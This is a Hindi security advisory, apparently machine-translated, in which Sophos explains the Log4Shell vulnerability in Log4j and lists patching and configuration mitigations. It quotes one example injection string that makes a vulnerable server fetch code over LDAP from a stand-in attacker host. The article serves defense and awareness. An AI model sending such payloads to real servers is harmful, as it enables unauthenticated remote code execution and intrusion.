Log4j चेतावनी: सोफोस क्या अनुशंसा करता है

Java भेद्यता Log4j - Log4Shell - क्या हुआ और अब क्या करना है। Hafnium, Kaseya या Solarwinds के बाद, कंपनियों को एक बार फिर से Log4j - Log4Shell नामक हाई-प्रोफाइल सर्वर भेद्यता से निपटना होगा। सोफोस सबसे महत्वपूर्ण तथ्यों को स्पष्ट करता है और आपको बताता है कि क्या करना है।

Log4Shell नाम इस तथ्य को संदर्भित करता है कि शोषण किया जा रहा दोष Log4j (जावा के लिए लॉगिंग) नामक एक लोकप्रिय जावा कोड लाइब्रेरी में समाहित है, और यदि हमलावर भेद्यता का सफलतापूर्वक शोषण करते हैं, तो वे प्रभावी रूप से एक शेल प्राप्त करते हैं - किसी भी सिस्टम कोड को चलाने का अवसर आपके चयन का।

"Log4Shell हमले का मुख्य बिंदु यह है कि सर्वर स्वचालित रूप से कोड निष्पादित करता है। एक हमलावर भेद्यता वाले सर्वर पर जो कुछ भी करना चाहता है, वह कर सकता है। इसलिए जितनी जल्दी हो सके पैच करना बेहद जरूरी है, क्योंकि वहां बहुत से लोग जो अच्छे नहीं हैं, वे पहले से ही परीक्षण करने की कोशिश कर रहे हैं कि कौन से सर्वर अभी भी कमजोर हैं।"

पॉल डकलिन, सोफोस में आईटी सुरक्षा विशेषज्ञ

और जैसे कि वह आदेश पर्याप्त नहीं था, भेद्यता को शून्य-दिन भेद्यता के रूप में ट्वीट किया गया है, जो एक सुरक्षा दोष है जिसे पैच उपलब्ध होने से पहले प्रलेखित किया जाएगा। इसके अलावा, अवधारणा का प्रमाण (पीओसी) गिटहब पर प्रकाशित किया गया था और समस्या दुनिया भर में ज्ञात हो गई थी, जबकि यह अभी भी अप्रकाशित थी। उदाहरण के लिए, शुक्रवार से दुनिया भर में और जर्मनी में भी खतरे की घंटी जोर से बज रही है बीएसआई ने रेड वार्निंग लेवल घोषित किया.

अनुचित इनपुट सत्यापन

भेद्यता, जिसे अब आधिकारिक तौर पर CVE-2021-44228 के रूप में जाना जाता है, की उत्पत्ति तब हुई जब एक असुरक्षित सर्वर को एक हानिरहित अनुरोध भेजा गया था, जिसमें कुछ डेटा शामिल था - जैसे कि एक HTTP हेडर - जिसकी साइबर अपराधी अपेक्षा करते हैं (या जानते भी हैं) कि सर्वर उन्हें लिखता है। इसकी लॉग फ़ाइल। इस तरह से इंजेक्ट किया गया डेटा एक छिपा हुआ "बूबी ट्रैप" बनाता है, क्योंकि सर्वर डेटा को लॉगिंग के लिए उपयुक्त प्रारूप में परिवर्तित करता है, यह आवश्यक लॉग प्रविष्टि बनाने के एक अभिन्न अंग के रूप में एक वेब डाउनलोड शुरू करता है। और यह क्रिया कठिन है, क्योंकि यदि वापस आने वाला डेटा एक वैध जावा प्रोग्राम (एक .class फ़ाइल, शब्दजाल में) है, तो सर्वर उस फ़ाइल को लॉग डेटा उत्पन्न करने में मदद करने के लिए निष्पादित करता है।

पैच न की गई Log4j लाइब्रेरी लॉगिंग आवश्यकताओं की अनुमति देती है

ट्रिक यह है कि Log4j लाइब्रेरी के पैच न किए गए संस्करण सामान्य LDAP (निर्देशिका सेवाओं) खोजों के साथ-साथ विभिन्न अन्य ऑनलाइन खोजों को ट्रिगर करने के लिए डिफ़ॉल्ट रूप से लॉगिंग अनुरोधों की अनुमति देते हैं। यह "फीचर" बहुत उपयोगी डेटा को बदलने में मदद करने के लिए मौजूद है, उदाहरण के लिए उपयोगकर्ता आईडी जैसे OZZJ5JYPVK, मानव-पठनीय जानकारी में जो आपके नेटवर्क पर समझ में आता है, जैसे पीटर मिलर। ये अनुरोध आमतौर पर उपयोग किए जाने वाले जावा टूलकिट के माध्यम से किए जाते हैं जिन्हें जेएनडीआई कहा जाता है, जो जावा नामकरण और निर्देशिका इंटरफ़ेस के लिए संक्षिप्त है।

यह दृष्टिकोण तब तक व्यवहार्य है जब तक कि लॉग डेटा जो सर्वर-साइड कोड निष्पादन को ट्रिगर कर सकता है, आपके अपने नेटवर्क पर निर्देशिका सर्वर तक सीमित है। हालांकि, कई सर्वर तदनुसार स्थापित नहीं होते हैं, और इसलिए दुर्भावनापूर्ण "लॉगस्प्लोटर" {$jndi:ldap://dodgy.example:389/badcode} जैसे पाठ को डेटा में एम्बेड करने का प्रयास कर सकते हैं, वे अपेक्षा करते हैं कि कंपनियां स्वचालित रूप से लॉग और सर्वर करें

• निर्दिष्ट अविश्वसनीय बाहरी सर्वर पर निर्दिष्ट पोर्ट (हमारे उदाहरण में 389) पर LDAP अनुरोध भेजने के लिए JNDI का उपयोग करें।
• स्थान बैडकोड में अविश्वसनीय सामग्री प्राप्त करें।
• लॉगिंग के साथ "सहायता" प्राप्त करने के लिए हमलावर द्वारा प्रदान किया गया कोड चलाएं।

सीधे शब्दों में कहें तो इस प्रथा को तकनीकी शब्दजाल में अप्रमाणित रिमोट कोड एक्ज़ीक्यूशन (RCE) के रूप में जाना जाता है। लॉग इन या पासवर्ड या एक्सेस टोकन की आवश्यकता के बिना, साइबर अपराधी सर्वरों को रिपोर्ट करने, उनके कोड को डाउनलोड करने, और इस तरह अपने मैलवेयर से खुद को संक्रमित करने के लिए हानिरहित दिखने वाले अनुरोध का उपयोग कर सकते हैं। सर्वर के पास आंतरिक नेटवर्क तक पहुंच के अधिकार के आधार पर, ऐसा आरसीई साइबर अपराधियों को विभिन्न प्रकार के दुर्भावनापूर्ण कार्यों को करने में मदद कर सकता है।

और ठीक यही बात वर्तमान शतरंज बिंदु Log4Shell को इतना खतरनाक बनाती है। हमलावर सैद्धांतिक रूप से सर्वर से ही डेटा निकाल सकते हैं; आंतरिक नेटवर्क के बारे में विवरण प्राप्त करें, सर्वर पर डेटा बदलें; नेटवर्क में अन्य सर्वरों से डेटा बहिष्कृत करें; भविष्य के हमलों के लिए सर्वर या नेटवर्क पर अतिरिक्त बैकडोर सेट अप करें या नेटवर्क स्नूपर्स, मेमोरी स्क्रेपर्स, डेटा चोरी करने वाले और क्रिप्टोमिनर्स जैसे अतिरिक्त मैलवेयर इंस्टॉल करें।

अब क्या करें!

लाइसेंसर अपाचे ने इस विषय पर एक व्यावहारिक सुरक्षा सलाह प्रकाशित की है. सोफोस सबसे महत्वपूर्ण बातों को फिर से सारांशित करता है:

• Apache Log4j 2.15.0 में अपग्रेड करें। यदि आप Log4j का उपयोग कर रहे हैं, तो ऐसा लगता है कि 2 और पहले का कोई भी 2.14.1.x संस्करण डिफ़ॉल्ट रूप से असुरक्षित है। (यदि आप अभी भी Log4j 1.x का उपयोग कर रहे हैं, तो अपग्रेड भी अनिवार्य है क्योंकि यह अब अपडेट प्रदान नहीं करता है)।
• JNDI द्वारा अविश्वसनीय सर्वरों से अनुरोध करने की संभावना को रोकना। यदि आप अपडेट करने में असमर्थ हैं लेकिन Log4j 2.10.0 या बाद के संस्करण का उपयोग कर रहे हैं, तो आप log4j2.formatMsgNoLookups कॉन्फ़िगरेशन मान को सही पर सेट कर सकते हैं, जो आउटगोइंग LDAP और समान लुकअप को पहले स्थान पर रोक देगा।
• उपयोग किए गए जावा रनटाइम की जाँच करना। आपके द्वारा उपयोग किया जा रहा अंतर्निहित जावा बिल्ड इस त्रुटि को अपने स्वयं के डिफ़ॉल्ट कॉन्फ़िगरेशन के आधार पर फेंके जाने से रोक सकता है। उदाहरण के लिए, अपाचे स्पष्ट रूप से ओरेकल जावा 8u121 को इस आरसीई के खिलाफ सुरक्षा के रूप में सूचीबद्ध करता है।

क्या भेद्यता निजी उपयोगकर्ताओं को भी प्रभावित करती है?

Log4Shell का मतलब न केवल कंपनियों के लिए रेड अलर्ट है, बल्कि निजी उपयोगकर्ता भी अंतराल के प्रभाव से प्रभावित हो सकते हैं। यह विशेष रूप से सच है जब लोग किसी होस्टिंग कंपनी या अन्य प्रबंधित सेवा प्रदाता द्वारा संचालित क्लाउड सर्वर का उपयोग करते हैं - चाहे वह कोई ब्लॉग, फ़ोरम या पारिवारिक वेबसाइट हो। यहां करने वाली पहली बात यह पता लगाना है कि क्या ये सेवाएं कमजोर हैं और कब पैच की योजना बनाई गई है। फिलहाल यह निश्चित रूप से प्रासंगिक वेबसाइटों पर जानकारी देखने के लिए अधिक समझ में आता है, क्योंकि इस समय प्रदाताओं के ईमेल से भर जाने की संभावना है।

सेवा प्रदाताओं के संदेशों पर ध्यान दें

इसके अलावा, मेलबॉक्स में उपयोग की जाने वाली ऑनलाइन सेवाओं से आधिकारिक सुरक्षा चेतावनियों पर ध्यान दिया जाना चाहिए... लेकिन यहां भी सावधानी बरतना महत्वपूर्ण है! यदि उपयोगकर्ता वर्तमान सुरक्षा भेद्यता के बारे में संदेश प्राप्त करते हैं - संभवतः अभी भी एक प्रमुख सेवा प्रदाता से - उन्हें स्वचालित रूप से चेतावनी में दिए गए लिंक पर क्लिक नहीं करना चाहिए या महत्वपूर्ण जांच के बिना टेलीफोन नंबर डायल नहीं करना चाहिए। मीडिया-प्रेमी साइबर हमले जैसे Log4Shell जल्दी से मुक्त सवारों को भड़काते हैं जो अपने फ़िशिंग हमलों के लिए उपयोगकर्ताओं के डर का उपयोग करना चाहते हैं। संदेह होने पर, उपयोगकर्ताओं को URL, ईमेल पते, या फ़ोन नंबरों का उपयोग करके जानकारी प्राप्त करने का अपना तरीका खोजना चाहिए, जिनका उन्होंने पहले उपयोग किया है।

Sophos.com पर अधिक

 

---

सोफोस के बारे में

सोफोस पर 100 देशों में 150 मिलियन से अधिक उपयोगकर्ता भरोसा करते हैं। हम जटिल आईटी खतरों और डेटा हानि के विरुद्ध सर्वोत्तम सुरक्षा प्रदान करते हैं। हमारे व्यापक सुरक्षा समाधानों को तैनात करना, उपयोग करना और प्रबंधित करना आसान है। वे उद्योग में स्वामित्व की सबसे कम कुल लागत की पेशकश करते हैं। सोफोस पुरस्कार विजेता एन्क्रिप्शन समाधान, एंडपॉइंट, नेटवर्क, मोबाइल डिवाइस, ईमेल और वेब के लिए सुरक्षा समाधान प्रदान करता है। मालिकाना विश्लेषण केंद्रों के हमारे वैश्विक नेटवर्क सोफोसलैब्स से भी समर्थन प्राप्त है। सोफोस का मुख्यालय बोस्टन, यूएसए और ऑक्सफोर्ड, यूके में है।

---

 

विषय से संबंधित लेख